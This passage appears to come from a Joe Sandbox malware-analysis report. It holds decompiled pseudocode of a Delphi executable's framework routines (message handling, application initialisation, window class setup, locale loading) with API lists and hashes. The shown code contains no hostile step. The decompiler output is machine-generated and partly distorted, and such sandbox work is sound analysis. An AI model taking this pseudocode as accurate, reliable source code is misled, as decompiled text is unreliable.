                                  						_push( *((intOrPtr*)(_t71 + 8)));
                                  						_push( *((intOrPtr*)(_t71 + 4)));
                                  						_push( *_t71);
                                  						_t38 = E0043BA58(_t95);
                                  						_push(_t38);
                                  						L004065DC();
                                  						return _t38;
                                  					}
                                  					_t39 = _t31 - 0xae3c;
                                  					__eflags = _t39;
                                  					if(_t39 == 0) {
                                  						_t92 = E0044C8E0(__eax, 1);
                                  						__eflags = _t92;
                                  						if(_t92 != 0) {
                                  							__eflags = _t95 - _t92;
                                  							if(_t95 != _t92) {
                                  								E00435DE4(_t92,  *((intOrPtr*)(_t71 + 4)), 0xb047,  *((intOrPtr*)(_t71 + 8)));
                                  							}
                                  						}
                                  						goto L38;
                                  					}
                                  					__eflags = _t39 == 3;
                                  					if(_t39 == 3) {
                                  						return  *((intOrPtr*)( *__eax + 0xb0))();
                                  					} else {
                                  						goto L38;
                                  					}
                                  				}
                                  				if(_t97 == 0) {
                                  					_t27 = E00435EB4(__eax, __edx);
                                  					__eflags =  *((intOrPtr*)(__edx + 0xc)) - 0xffffffff;
                                  					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                  						goto L39;
                                  					}
                                  					 *_t96 =  *((intOrPtr*)(__edx + 8));
                                  					_v28 =  *_t96;
                                  					_v24 = _v30;
                                  					E004346D0(_t95,  &_v20,  &_v28);
                                  					_t27 = E00438EA0(_t95, 0,  &_v20, 0, 0);
                                  					__eflags = _t27;
                                  					if(_t27 == 0) {
                                  						goto L39;
                                  					}
                                  					 *(_t71 + 0xc) = 1;
                                  					return _t27;
                                  				}
                                  				_t55 = _t23 - 7;
                                  				if(_t55 == 0) {
                                  					_t93 = E0044C8E0(__eax, 1);
                                  					__eflags = _t93;
                                  					if(_t93 == 0) {
                                  						goto L38;
                                  					}
                                  					_t27 =  *((intOrPtr*)( *_t93 + 0xf4))();
                                  					__eflags = _t27;
                                  					if(_t27 == 0) {
                                  						goto L39;
                                  					}
                                  					goto L38;
                                  				}
                                  				_t27 = _t55 - 1;
                                  				if(_t27 == 0) {
                                  					__eflags =  *(__eax + 0x54) & 0x00000020;
                                  					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                  						goto L39;
                                  					}
                                  					goto L38;
                                  				}
                                  				_t59 = _t27 - 0x17;
                                  				if(_t59 == 0) {
                                  					_t61 = E0043BA58(__eax);
                                  					_t62 = GetCapture();
                                  					__eflags = _t61 - _t62;
                                  					if(_t61 == _t62) {
                                  						__eflags =  *0x46edb0;
                                  						if( *0x46edb0 != 0) {
                                  							_t63 =  *0x46edb0; // 0x0
                                  							__eflags = _t95 -  *((intOrPtr*)(_t63 + 0x30));
                                  							if(_t95 ==  *((intOrPtr*)(_t63 + 0x30))) {
                                  								_t64 =  *0x46edb0; // 0x0
                                  								E00435DE4(_t64, 0, 0x1f, 0);
                                  							}
                                  						}
                                  					}
                                  					goto L38;
                                  				}
                                  				if(_t59 == 2) {
                                  					_t27 = E00438F64(__eax, 0, __edx, __eflags);
                                  					__eflags = _t27;
                                  					if(_t27 == 0) {
                                  						goto L38;
                                  					}
                                  					__eflags =  *(_t71 + 0xc);
                                  					if( *(_t71 + 0xc) != 0) {
                                  						goto L39;
                                  					}
                                  					_t27 = E0043BD58(_t95);
                                  					__eflags = _t27;
                                  					if(_t27 == 0) {
                                  						goto L39;
                                  					}
                                  					return E00435EB4(_t95, _t71);
                                  				} else {
                                  					goto L38;
                                  				}
                                  			}


























                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Capture
                                  • String ID:
                                  • API String ID: 1145282425-0
                                  • Opcode ID: 0f1ff6185bd36a70e3a3b68e6a5d70dfe93b48ff67c49739f0d1f1408d26497b
                                  • Instruction ID: ecd7fcb2517a2c3b73fce16e1ad2478b52199ab01e9d76c7ca558aaf7ea5c07c
                                  • Opcode Fuzzy Hash: 0f1ff6185bd36a70e3a3b68e6a5d70dfe93b48ff67c49739f0d1f1408d26497b
                                  • Instruction Fuzzy Hash: A54162B130460187EA10BA2E89C576E62DAAB4C758F14616BEC45CB3C5DBBDCE06874E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00435EB4(intOrPtr* __eax, signed int* __edx) {
                                  				signed int _v12;
                                  				short _v14;
                                  				char _v16;
                                  				signed int _v20;
                                  				intOrPtr* _v24;
                                  				char _v280;
                                  				signed int _t39;
                                  				signed int _t40;
                                  				signed int _t46;
                                  				intOrPtr* _t47;
                                  				signed int _t50;
                                  				signed int _t53;
                                  				intOrPtr _t55;
                                  				intOrPtr _t56;
                                  				signed int _t67;
                                  				signed int _t68;
                                  				void* _t73;
                                  				signed int* _t79;
                                  				intOrPtr _t90;
                                  				intOrPtr* _t98;
                                  				void* _t109;
                                  
                                  				_t79 = __edx;
                                  				_t98 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
                                  					L4:
                                  					_t39 =  *_t79;
                                  					if(_t39 < 0x100 || _t39 > 0x109) {
                                  						_t40 =  *_t79;
                                  						__eflags = _t40 - 0x200;
                                  						if(_t40 < 0x200) {
                                  							L30:
                                  							__eflags = _t40 - 0xb00b;
                                  							if(_t40 == 0xb00b) {
                                  								E0043472C(_t98, _t79[1], _t40, _t79[2]);
                                  							}
                                  							L32:
                                  							return  *((intOrPtr*)( *_t98 - 0x14))();
                                  						}
                                  						__eflags = _t40 - 0x20a;
                                  						if(_t40 > 0x20a) {
                                  							goto L30;
                                  						}
                                  						__eflags =  *(_t98 + 0x50) & 0x00000080;
                                  						if(( *(_t98 + 0x50) & 0x00000080) != 0) {
                                  							L16:
                                  							_t46 =  *_t79 - 0x200;
                                  							__eflags = _t46;
                                  							if(__eflags == 0) {
                                  								L21:
                                  								_t47 =  *0x46fc50; // 0x470b40
                                  								E004570D0( *_t47, _t79, _t98, __eflags, _t109);
                                  								goto L32;
                                  							}
                                  							_t50 = _t46 - 1;
                                  							__eflags = _t50;
                                  							if(_t50 == 0) {
                                  								L22:
                                  								__eflags =  *((char*)(_t98 + 0x5d)) - 1;
                                  								if(__eflags != 0) {
                                  									 *(_t98 + 0x54) =  *(_t98 + 0x54) | 0x00000001;
                                  									goto L32;
                                  								}
                                  								return E00403594(_t98, __eflags);
                                  							}
                                  							_t53 = _t50 - 1;
                                  							__eflags = _t53;
                                  							if(_t53 == 0) {
                                  								 *(_t98 + 0x54) =  *(_t98 + 0x54) & 0x0000fffe;
                                  								goto L32;
                                  							}
                                  							__eflags = _t53 == 1;
                                  							if(_t53 == 1) {
                                  								goto L22;
                                  							}
                                  							_t55 =  *0x470aa0; // 0x0
                                  							__eflags =  *((char*)(_t55 + 0x20));
                                  							if( *((char*)(_t55 + 0x20)) == 0) {
                                  								goto L32;
                                  							} else {
                                  								_t56 =  *0x470aa0; // 0x0
                                  								__eflags =  *(_t56 + 0x1c);
                                  								if( *(_t56 + 0x1c) == 0) {
                                  									goto L32;
                                  								}
                                  								_t90 =  *0x470aa0; // 0x0
                                  								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
                                  								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
                                  									goto L32;
                                  								}
                                  								GetKeyboardState( &_v280);
                                  								_v20 =  *_t79;
                                  								_v16 = E0044C824( &_v280);
                                  								_v14 = _t79[1] & 0x0000ffff;
                                  								_v12 = _t79[2];
                                  								return E00403594(_t98, __eflags);
                                  							}
                                  							goto L21;
                                  						}
                                  						_t67 = _t40 - 0x203;
                                  						__eflags = _t67;
                                  						if(_t67 == 0) {
                                  							L15:
                                  							 *_t79 =  *_t79 - 2;
                                  							__eflags =  *_t79;
                                  							goto L16;
                                  						}
                                  						_t68 = _t67 - 3;
                                  						__eflags = _t68;
                                  						if(_t68 == 0) {
                                  							goto L15;
                                  						}
                                  						__eflags = _t68 != 3;
                                  						if(_t68 != 3) {
                                  							goto L16;
                                  						}
                                  						goto L15;
                                  					}
                                  					_v24 = E0044C8E0(_t98, 1);
                                  					if(_v24 == 0) {
                                  						goto L32;
                                  					}
                                  					_t73 =  *((intOrPtr*)( *_v24 + 0xfc))();
                                  					if(_t73 == 0) {
                                  						goto L32;
                                  					}
                                  				} else {
                                  					_v24 = E0044C8E0(__eax, 0);
                                  					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x268)) == 0) {
                                  						goto L4;
                                  					} else {
                                  						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x268)))) + 0x24))();
                                  						if(_t73 == 0) {
                                  							goto L4;
                                  						}
                                  					}
                                  				}
                                  				return _t73;
                                  			}


                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 00435FED
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: KeyboardState
                                  • String ID:
                                  • API String ID: 1724228437-0
                                  • Opcode ID: 1877fe6a1f2c12efd9516374ee786c9bec151850e204b1f77f3cd22c5db8a17f
                                  • Instruction ID: 20541049fbaca84a1518ccd6cc0ed2cd5f2f7fc94101191d14fcc18e58a4b920
                                  • Opcode Fuzzy Hash: 1877fe6a1f2c12efd9516374ee786c9bec151850e204b1f77f3cd22c5db8a17f
                                  • Instruction Fuzzy Hash: 3241C430A006069BDB25DF29C4896AAB7F0EF0D348F649067E445DB391C778DD42CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0045543C(intOrPtr _a4) {
                                  				intOrPtr _t26;
                                  
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                  				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                  				_push(_t26); // executed
                                  				L004065DC(); // executed
                                  				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                  				return _t26;
                                  			}


                                  APIs
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00455466
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4255912815-0
                                  • Opcode ID: a7f0a890f5c314e9b785444fcef0f2b0510aa49a97277d688b7d923261cfddac
                                  • Instruction ID: 1c27f2a9b3722435145c729b4a5680538d8c19e3b6424436bdec4861056ead6e
                                  • Opcode Fuzzy Hash: a7f0a890f5c314e9b785444fcef0f2b0510aa49a97277d688b7d923261cfddac
                                  • Instruction Fuzzy Hash: C9F0C579205608AFCB40DF9DD588D4AFBE8BB4C260B058195B988CB325C634FD81CF94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 85%
                                  			E00440E40(void* __ebx, void* __edi, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				long _v28;
                                  				char _v32;
                                  				char _v36;
                                  				intOrPtr _t25;
                                  				char _t29;
                                  				intOrPtr _t35;
                                  				intOrPtr _t38;
                                  				intOrPtr _t47;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t50;
                                  				intOrPtr _t53;
                                  				struct HINSTANCE__* _t63;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t80;
                                  				intOrPtr _t83;
                                  				void* _t87;
                                  
                                  				_v20 = 0;
                                  				_v8 = 0;
                                  				_push(_t87);
                                  				_push(0x440fb8);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t87 + 0xffffffe0;
                                  				_v16 = GetCurrentProcessId();
                                  				_v12 = 0;
                                  				E00408F74("Delphi%.8X", 0,  &_v16,  &_v8);
                                  				E00404170(0x470ab0, _v8);
                                  				_t25 =  *0x470ab0; // 0x0
                                  				 *0x470aac = GlobalAddAtomA(E004045DC(_t25));
                                  				_t29 =  *0x470664; // 0x400000
                                  				_v36 = _t29;
                                  				_v32 = 0;
                                  				_v28 = GetCurrentThreadId();
                                  				_v24 = 0;
                                  				E00408F74("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                  				E00404170(0x470ab4, _v20);
                                  				_t35 =  *0x470ab4; // 0x0
                                  				 *0x470aae = GlobalAddAtomA(E004045DC(_t35));
                                  				_t38 =  *0x470ab4; // 0x0
                                  				 *0x470ab8 = RegisterClipboardFormatA(E004045DC(_t38));
                                  				 *0x470af0 = E00413F44(1);
                                  				E00440A48();
                                  				 *0x470aa0 = E00440870(1, 1);
                                  				_t47 = E0045385C(1, __edi);
                                  				_t78 =  *0x46fda0; // 0x470b44
                                  				 *_t78 = _t47;
                                  				_t49 = E00454A70(0, 1);
                                  				_t80 =  *0x46fc50; // 0x470b40
                                  				 *_t80 = _t49;
                                  				_t50 =  *0x46fc50; // 0x470b40
                                  				E00456B3C( *_t50, 1);
                                  				_t53 =  *0x42ef40; // 0x42ef44
                                  				E004136EC(_t53, 0x431ac4, 0x431ad4);
                                  				_t63 = GetModuleHandleA("USER32");
                                  				if(_t63 != 0) {
                                  					 *0x46ecec = GetProcAddress(_t63, "AnimateWindow");
                                  				}
                                  				_pop(_t83);
                                  				 *[fs:eax] = _t83;
                                  				_push(0x440fbf);
                                  				E0040411C( &_v20);
                                  				return E0040411C( &_v8);
                                  			}


                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,00000000,00440FB8), ref: 00440E61
                                  • GlobalAddAtomA.KERNEL32 ref: 00440E94
                                  • GetCurrentThreadId.KERNEL32 ref: 00440EAF
                                  • GlobalAddAtomA.KERNEL32 ref: 00440EE5
                                  • RegisterClipboardFormatA.USER32 ref: 00440EFB
                                    • Part of subcall function 00413F44: RtlInitializeCriticalSection.KERNEL32(00411A68,?,?,0041AE3D,00000000,0041AE61), ref: 00413F63
                                    • Part of subcall function 00440A48: SetErrorMode.KERNEL32(00008000), ref: 00440A61
                                    • Part of subcall function 00440A48: GetModuleHandleA.KERNEL32(USER32,00000000,00440BAE,?,00008000), ref: 00440A85
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00440A92
                                    • Part of subcall function 00440A48: LoadLibraryA.KERNEL32(imm32.dll,00000000,00440BAE,?,00008000), ref: 00440AAE
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00440AD0
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440AE5
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440AFA
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00440B0F
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00440B24
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00440B39
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00440B4E
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00440B63
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00440B78
                                    • Part of subcall function 00440A48: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440B8D
                                    • Part of subcall function 00440A48: SetErrorMode.KERNEL32(?,00440BB5,00008000), ref: 00440BA8
                                    • Part of subcall function 0045385C: GetKeyboardLayout.USER32(00000000), ref: 004538A1
                                    • Part of subcall function 0045385C: 72E7AC50.USER32(00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 004538F6
                                    • Part of subcall function 0045385C: 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00453900
                                    • Part of subcall function 0045385C: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00440F3A,00000000,00000000,?,00000000,?,00000000), ref: 0045390B
                                    • Part of subcall function 00454A70: LoadIconA.USER32(00400000,MAINICON), ref: 00454B67
                                    • Part of subcall function 00454A70: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454B99
                                    • Part of subcall function 00454A70: OemToCharA.USER32(?,?), ref: 00454BAC
                                    • Part of subcall function 00454A70: CharNextA.USER32(?,00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454BEB
                                    • Part of subcall function 00454A70: CharLowerA.USER32(00000000,?,00400000,?,00000100,?,?,?,00440F50,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00454BF1
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440FB8), ref: 00440F7F
                                  • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440F90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterSectionThread
                                  • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DB$USER32
                                  • API String ID: 1368734802-524302110
                                  • Opcode ID: 409f8933a92a13d96003edcbbfcf2c944e75a6f4b82560a894be135fe1716861
                                  • Instruction ID: 6ebe88a16ec22b620701bafe8b5e2749bc902e52cad4eba81a9d15a62b54c17e
                                  • Opcode Fuzzy Hash: 409f8933a92a13d96003edcbbfcf2c944e75a6f4b82560a894be135fe1716861
                                  • Instruction Fuzzy Hash: 31417C70A043459FDB00FFA5DC8298E77B4AB58308F00447AF505EB7A2DB78A958CB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 41%
                                  			E00454DBC(void* __eax, void* __ebx, void* __ecx) {
                                  				struct _WNDCLASSA _v44;
                                  				char _v48;
                                  				char* _t22;
                                  				CHAR* _t26;
                                  				struct HINSTANCE__* _t27;
                                  				intOrPtr* _t29;
                                  				signed int _t32;
                                  				intOrPtr* _t33;
                                  				signed int _t36;
                                  				struct HINSTANCE__* _t37;
                                  				void* _t39;
                                  				CHAR* _t40;
                                  				struct HWND__* _t41;
                                  				char* _t47;
                                  				char* _t52;
                                  				long _t55;
                                  				long _t59;
                                  				struct HINSTANCE__* _t62;
                                  				intOrPtr _t64;
                                  				void* _t69;
                                  				struct HMENU__* _t70;
                                  				intOrPtr _t77;
                                  				void* _t83;
                                  				short _t88;
                                  
                                  				_v48 = 0;
                                  				_t69 = __eax;
                                  				_push(_t83);
                                  				_push(0x454f5d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t83 + 0xffffffd4;
                                  				if( *((char*)(__eax + 0xac)) != 0) {
                                  					L13:
                                  					_pop(_t77);
                                  					 *[fs:eax] = _t77;
                                  					_push(0x454f64);
                                  					return E0040411C( &_v48);
                                  				}
                                  				_t22 =  *0x46fcb0; // 0x470048
                                  				if( *_t22 != 0) {
                                  					goto L13;
                                  				}
                                  				 *(_t69 + 0x40) = E0041AB90(E004554C4, __eax);
                                  				 *0x46f030 = L004065DC;
                                  				_t26 =  *0x46f050; // 0x454a60
                                  				_t27 =  *0x470664; // 0x400000
                                  				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
                                  					_t62 =  *0x470664; // 0x400000
                                  					 *0x46f03c = _t62;
                                  					_t88 = RegisterClassA(0x46f02c);
                                  					if(_t88 == 0) {
                                  						_t64 =  *0x46fa44; // 0x41b628
                                  						E00405C70(_t64,  &_v48);
                                  						E0040B830(_v48, 1);
                                  						E00403B64();
                                  					}
                                  				}
                                  				_t29 =  *0x46fb00; // 0x470904
                                  				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
                                  				if(_t88 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				_t33 =  *0x46fb00; // 0x470904
                                  				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
                                  				if(_t88 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				_push(_t36);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_t37 =  *0x470664; // 0x400000
                                  				_push(_t37);
                                  				_push(0);
                                  				_t7 = _t69 + 0x8c; // 0x69746163
                                  				_t39 = E004045DC( *_t7);
                                  				_t40 =  *0x46f050; // 0x454a60, executed
                                  				_t41 = E00406B1C(_t40, _t39); // executed
                                  				 *(_t69 + 0x30) = _t41;
                                  				_t9 = _t69 + 0x8c; // 0x44c408
                                  				E0040411C(_t9);
                                  				 *((char*)(_t69 + 0xac)) = 1;
                                  				_t11 = _t69 + 0x40; // 0x10940000
                                  				_t12 = _t69 + 0x30; // 0xe
                                  				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                  				_t47 =  *0x46fb78; // 0x470aa4
                                  				if( *_t47 != 0) {
                                  					_t55 = E00455BD0(_t69);
                                  					_t13 = _t69 + 0x30; // 0xe
                                  					SendMessageA( *_t13, 0x80, 1, _t55); // executed
                                  					_t59 = E00455BD0(_t69);
                                  					_t14 = _t69 + 0x30; // 0xe
                                  					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
                                  				}
                                  				_t15 = _t69 + 0x30; // 0xe
                                  				_t70 = GetSystemMenu( *_t15, "true");
                                  				DeleteMenu(_t70, 0xf030, 0);
                                  				DeleteMenu(_t70, 0xf000, 0);
                                  				_t52 =  *0x46fb78; // 0x470aa4
                                  				if( *_t52 != 0) {
                                  					DeleteMenu(_t70, 0xf010, 0);
                                  				}
                                  				goto L13;
                                  			}

                                  0x00000000

                                  APIs
                                    • Part of subcall function 0041AB90: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041ABAE
                                  • GetClassInfoA.USER32 ref: 00454E1B
                                  • RegisterClassA.USER32 ref: 00454E33
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  • SetWindowLongA.USER32 ref: 00454ECF
                                  • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00454EF1
                                  • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,0044C37C), ref: 00454F04
                                  • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,0044C37C), ref: 00454F0F
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C37C), ref: 00454F1E
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C37C), ref: 00454F2B
                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C37C), ref: 00454F42
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                  • String ID: `JE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 72%
                                  			E0040C77C(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				void* _t104;
                                  				void* _t111;
                                  				void* _t133;
                                  				intOrPtr _t183;
                                  				intOrPtr _t193;
                                  				intOrPtr _t194;
                                  
                                  				_t191 = __esi;
                                  				_t190 = __edi;
                                  				_t193 = _t194;
                                  				_t133 = 8;
                                  				do {
                                  					_push(0);
                                  					_push(0);
                                  					_t133 = _t133 - 1;
                                  				} while (_t133 != 0);
                                  				_push(__ebx);
                                  				_push(_t193);
                                  				_push(0x40ca47);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t194; // executed
                                  				E0040C6B8(); // executed
                                  				E0040B11C(__ebx, __edi, __esi);
                                  				_t196 =  *0x470750;
                                  				if( *0x470750 != 0) {
                                  					E0040B2F4(__esi, _t196);
                                  				}
                                  				_t132 = GetThreadLocale();
                                  				E0040B068(_t43, 0, 0x14,  &_v20);
                                  				E00404170(0x470684, _v20);
                                  				E0040B068(_t43, 0x40ca5c, 0x1b,  &_v24);
                                  				 *0x470688 = E004081CC(0x40ca5c, 0, _t196);
                                  				E0040B068(_t132, 0x40ca5c, 0x1c,  &_v28);
                                  				 *0x470689 = E004081CC(0x40ca5c, 0, _t196);
                                  				 *0x47068a = E0040B0B4(_t132, 0x2c, 0xf);
                                  				 *0x47068b = E0040B0B4(_t132, 0x2e, 0xe);
                                  				E0040B068(_t132, 0x40ca5c, 0x19,  &_v32);
                                  				 *0x47068c = E004081CC(0x40ca5c, 0, _t196);
                                  				 *0x47068d = E0040B0B4(_t132, 0x2f, 0x1d);
                                  				E0040B068(_t132, "m/d/yy", 0x1f,  &_v40);
                                  				E0040B3A4(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                  				E00404170(0x470690, _v36);
                                  				E0040B068(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                  				E0040B3A4(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                  				E00404170(0x470694, _v44);
                                  				 *0x470698 = E0040B0B4(_t132, 0x3a, 0x1e);
                                  				E0040B068(_t132, 0x40ca90, 0x28,  &_v52);
                                  				E00404170(0x47069c, _v52);
                                  				E0040B068(_t132, 0x40ca9c, 0x29,  &_v56);
                                  				E00404170(0x4706a0, _v56);
                                  				E0040411C( &_v12);
                                  				E0040411C( &_v16);
                                  				E0040B068(_t132, 0x40ca5c, 0x25,  &_v60);
                                  				_t104 = E004081CC(0x40ca5c, 0, _t196);
                                  				_t197 = _t104;
                                  				if(_t104 != 0) {
                                  					E004041B4( &_v8, 0x40cab4);
                                  				} else {
                                  					E004041B4( &_v8, 0x40caa8);
                                  				}
                                  				E0040B068(_t132, 0x40ca5c, 0x23,  &_v64);
                                  				_t111 = E004081CC(0x40ca5c, 0, _t197);
                                  				_t198 = _t111;
                                  				if(_t111 == 0) {
                                  					E0040B068(_t132, 0x40ca5c, 0x1005,  &_v68);
                                  					if(E004081CC(0x40ca5c, 0, _t198) != 0) {
                                  						E004041B4( &_v12, 0x40cad0);
                                  					} else {
                                  						E004041B4( &_v16, 0x40cac0);
                                  					}
                                  				}
                                  				_push(_v12);
                                  				_push(_v8);
                                  				_push(":mm");
                                  				_push(_v16);
                                  				E0040449C();
                                  				_push(_v12);
                                  				_push(_v8);
                                  				_push(":mm:ss");
                                  				_push(_v16);
                                  				E0040449C();
                                  				 *0x470752 = E0040B0B4(_t132, 0x2c, 0xc);
                                  				_pop(_t183);
                                  				 *[fs:eax] = _t183;
                                  				_push(E0040CA4E);
                                  				return E00404140( &_v68, 0x10);
                                  			}

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000000,0040CA47,?,?,00000000,00000000), ref: 0040C7B2
                                    • Part of subcall function 0040B068: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B086
